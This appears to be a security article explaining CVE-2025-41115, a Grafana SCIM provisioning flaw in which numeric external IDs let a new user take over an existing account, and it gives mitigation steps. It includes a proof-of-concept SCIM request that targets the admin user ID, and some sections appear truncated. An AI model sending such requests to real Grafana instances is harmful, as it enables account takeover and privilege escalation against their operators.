CVE-2025-41115 - Exploiting SCIM Provisioning in Grafana to Impersonate and Elevate Privileges

In April, Grafana introduced SCIM provisioning via Grafana Enterprise and Grafana Cloud. The intention was to help organizations automate user management—handling onboarding, offboarding, and team assignments seamlessly.

But in Grafana versions 12.x, a severe vulnerability was discovered in this SCIM provisioning feature: CVE-2025-41115. If the enableSCIM feature flag is enabled _and_ user_sync_enabled is set to true in the [auth.scim] config block, a SCIM client could exploit weak identity checks and assign numeric external IDs to new users. This can let an attacker impersonate other users or escalate privileges.

This article breaks down how the bug works, provides a proof of concept, and summarizes mitigation steps. Technical readers running Grafana Enterprise or Cloud in this scenario should act now.

How Does CVE-2025-41115 Work?

When SCIM provisioning is enabled and configured, Grafana trusts external SCIM clients to sync users. Every user provisioned through SCIM gets an externalId. Grafana expects this externalId to be a non-numeric string—usually a UUID or username. But versions 12.x don’t enforce this type strictly.

Problem: Numeric externalId Collisions

Internally, Grafana tracks users with numeric IDs (integers in the database). If a SCIM client creates a new user with an externalId like "5", and there’s already a user in Grafana with the internal ID 5, this dangerous ambiguity lets the new user override or impersonate the internal user.

User sync is enabled (user_sync_enabled = true)

- You understand SCIM API basics (usually POST/PUT to /api/scim/v2/Users endpoint).

Step 1: Find a Target’s Internal User ID

You need to know the integer internal ID of the user you want to impersonate. This can sometimes be found in URLs or via other tooling if you have some access:

# Example: List users via API (with admin access)
curl -H "Authorization: Bearer <token>" https://grafana.example.com/api/admin/users

Step 2: Provision User with Numeric externalId

Post this JSON to the SCIM Users endpoint, setting "externalId": "1" (or whatever the internal target user ID is):

POST /api/scim/v2/Users
Content-Type: application/json

{
  "userName": "eviluser",
  "externalId": "1",
  "displayName": "Hacker User",
  "emails": [
     { "value": "evil@attacker.com", "primary": true }
  ],
  "active": true
}

With a Grafana 12.x instance (and required configs), Grafana may now link or map this new SCIM-created user directly to the existing user with internal ID 1—potentially giving you access to their account with their roles and privileges.

What Could Attackers Do?

- Impersonate privileged accounts. If you map to an admin’s internal ID, you can become an admin.

Escalate privileges of your attacker-controlled user.

- Ghost in the system: Because you use a legitimate externalId, the logs may not flag your presence.

Original References

- Grafana Security Release Note for CVE-2025-41115
- SCIM Provisioning docs
- CVE page (once published)

[auth.scim] user_sync_enabled = false

Revoke and audit users provisioned via SCIM recently.

Conclusion

CVE-2025-41115 is a dangerous identity flaw in Grafana’s SCIM integration. If your instance is running Grafana 12.x with SCIM and user sync enabled, you must review your exposure immediately.

Stay safe, and keep an eye on Grafana security advisories.

*This article is exclusive and written for security teams and Grafana administrators to understand and mitigate CVE-2025-41115 rapidly. Share with your IT security colleagues.*

Timeline

Published on: 11/21/2025 15:15:52 UTC
Last modified on: 11/25/2025 22:16:42 UTC